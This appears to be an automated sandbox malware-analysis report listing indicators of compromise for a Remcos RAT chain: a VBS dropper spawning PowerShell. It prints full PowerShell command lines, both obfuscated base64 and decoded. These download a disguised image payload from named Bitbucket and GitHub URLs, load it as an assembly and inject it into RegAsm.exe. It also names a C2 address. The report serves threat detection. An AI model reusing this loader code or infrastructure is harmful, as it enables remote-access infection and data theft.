Automated Malware Analysis IOC Report for

Files

File Path

Type

Processes

Path

Cmdline

Malicious

C:\Windows\System32\wscript.exe

C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_doc20241024.vbs"

Details

Is windows:	true
Is dropped:	false
PID:	3308
Target ID:	0
Parent PID:	4056
Name:	wscript.exe
Class:	wscript
Path:	C:\Windows\System32\wscript.exe
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_doc20241024.vbs"
Size:	170496
MD5:	A47CBE969EA935BDD3AB568BB126BC80
Time:	02:46:51
Date:	24/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff636340000
Modulesize:	184320
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Base64 Encoded PowerShell Command Detected	System Summary
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet	System Summary
Sigma detected: WScript or CScript Dropper	System Summary
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript	System Summary
Executes visual basic scripts	System Summary	Scripting
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#FM#bQBu#Gk#aQBG#Ek#LwBu#Gk#YQBt#C8#cwBk#GE#ZQBo#C8#cwBm#GU#cg#v#GE#bgBu#C8#QQBL#Ek#UwBF#EE#VwBV#EU#SgBJ#C8#bQBv#GM#LgB0#G4#ZQB0#G4#bwBj#HI#ZQBz#HU#YgB1#Gg#d#Bp#Gc#LgB3#GE#cg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec

Details

Is windows:	true
Is dropped:	false
PID:	4872
Target ID:	2
Parent PID:	3308
Name:	powershell.exe
Class:	powershell
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#FM#bQBu#Gk#aQBG#Ek#LwBu#Gk#YQBt#C8#cwBk#GE#ZQBo#C8#cwBm#GU#cg#v#GE#bgBu#C8#QQBL#Ek#UwBF#EE#VwBV#EU#SgBJ#C8#bQBv#GM#LgB0#G4#ZQB0#G4#bwBj#HI#ZQBz#HU#YgB1#Gg#d#Bp#Gc#LgB3#GE#cg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
Size:	452608
MD5:	04029E121A0CFA5991749937DD22A1D9
Time:	02:46:52
Date:	24/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff741d30000
Modulesize:	462848
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Powershell download and load assembly	Data Obfuscation
Sigma detected: Powershell download payload from hardcoded c2 list	Spreading
Yara detected Powershell download and execute	HIPS / PFW / Operating System Protection Evasion
Yara detected Remcos RAT	AV Detection, E-Banking Fraud, Stealing of Sensitive Information, Remote Access Functionality
Found suspicious powershell code related to unpacking or dynamic code loading	Data Obfuscation	Software Packing
Sigma detected: Base64 Encoded PowerShell Command Detected	System Summary
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands	System Summary
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet	System Summary
Suspicious execution chain found	Software Vulnerabilities	Exploitation for Client Execution
Suspicious powershell command line found	Data Obfuscation	PowerShell
Wscript starts Powershell (via cmd or directly)	System Summary	PowerShell Scripting
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection
Binary contains paths to debug symbols	Compliance, System Summary

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.SmniiFI/niam/sdaeh/sfer/ann/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec

Details

Is windows:	true
Is dropped:	false
PID:	8
Target ID:	6
Parent PID:	4872
Name:	powershell.exe
Class:	powershell
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.SmniiFI/niam/sdaeh/sfer/ann/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
Size:	452608
MD5:	04029E121A0CFA5991749937DD22A1D9
Time:	02:46:53
Date:	24/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff741d30000
Modulesize:	462848
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Powershell download and load assembly	Data Obfuscation
Sigma detected: Powershell download payload from hardcoded c2 list	Spreading
Yara detected Powershell download and execute	HIPS / PFW / Operating System Protection Evasion
Yara detected Remcos RAT	AV Detection, E-Banking Fraud, Stealing of Sensitive Information, Remote Access Functionality
Found suspicious powershell code related to unpacking or dynamic code loading	Data Obfuscation	Software Packing
Sigma detected: Base64 Encoded PowerShell Command Detected	System Summary
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands	System Summary
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet	System Summary
Suspicious execution chain found	Software Vulnerabilities	Exploitation for Client Execution
Suspicious powershell command line found	Data Obfuscation	PowerShell
Wscript starts Powershell (via cmd or directly)	System Summary	PowerShell Scripting
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection
Binary contains paths to debug symbols	Compliance, System Summary

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Details

Is windows:	true
Is dropped:	false
PID:	4512
Target ID:	13
Parent PID:	8
Name:	RegAsm.exe
Class:	system-tools
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Size:	65440
MD5:	0D5DF43AF2916F47D00C1573797C1A13
Time:	02:47:03
Date:	24/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x5f0000
Modulesize:	73728
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Yara detected Remcos RAT	AV Detection, E-Banking Fraud, Stealing of Sensitive Information, Remote Access Functionality
Injects a PE file into a foreign processes	HIPS / PFW / Operating System Protection Evasion	Process Injection
Suspicious execution chain found	Software Vulnerabilities	Exploitation for Client Execution
Writes to foreign memory regions	HIPS / PFW / Operating System Protection Evasion	Process Injection
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Details

Is windows:	true
Is dropped:	false
PID:	2460
Target ID:	3
Parent PID:	4872
Name:	conhost.exe
Path:	C:\Windows\System32\conhost.exe
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Size:	862208
MD5:	0D698AF330FD17BEE3BF90011D49251D
Time:	02:46:52
Date:	24/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff75da10000
Modulesize:	892928
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

URLs

Name

Malicious

https://raw.githubusercontent.com

unknown

https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417

unknown

https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723

185.199.108.133

https://raw.githubusercontent.com/IJEUWAESIKA/nna/refs/heads/main/IFiinmS.txt

185.199.108.133

http://geoplugin.net/json.gp

unknown

http://nuget.org/NuGet.exe

unknown

https://aka.ms/winsvr-2022-pshelp

unknown

http://pesterbdd.com/images/Pester.png

unknown

http://geoplugin.net/json.gp/C

unknown

http://schemas.xmlsoap.org/soap/encoding/

unknown

http://www.apache.org/licenses/LICENSE-2.0.html

unknown

https://go.micro

unknown

http://schemas.xmlsoap.org/wsdl/

unknown

https://contoso.com/

unknown

https://nuget.org/nuget.exe

unknown

https://contoso.com/License

unknown

https://contoso.com/Icon

unknown

https://aka.ms/winsvr-2022-pshelpX

unknown

https://aka.ms/pscore6

unknown

https://aka.ms/pscore68

unknown

http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

unknown

https://github.com/Pester/Pester

unknown

There are 12 hidden URLs, click here to show them.

IPs

Domain

Country

Malicious

185.199.108.133

unknown

Netherlands

Details

IP:	185.199.108.133
TargetID:	6
Current Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Country:	Netherlands
Countrycode:	NLD
ASN number:	54113
ASN name:	FASTLYUS
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Suricata IDS alerts for network traffic	Networking
Suricata IDS alerts with low severity for network traffic	Networking
Connects to IPs without corresponding DNS lookups	Networking
Uses secure TLS version for HTTPS connections	Compliance, Networking

154.216.18.51

unknown

Seychelles

Details

IP:	154.216.18.51
TargetID:	13
Current Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Country:	Seychelles
Countrycode:	SYC
ASN number:	135357
ASN name:	SKHT-ASShenzhenKatherineHengTechnologyInformationCo
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Found malware configuration	AV Detection
Suricata IDS alerts for network traffic	Networking
C2 URLs / IPs found in malware configuration	Networking	Application Layer Protocol
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port

Registry

Path

Value

Malicious

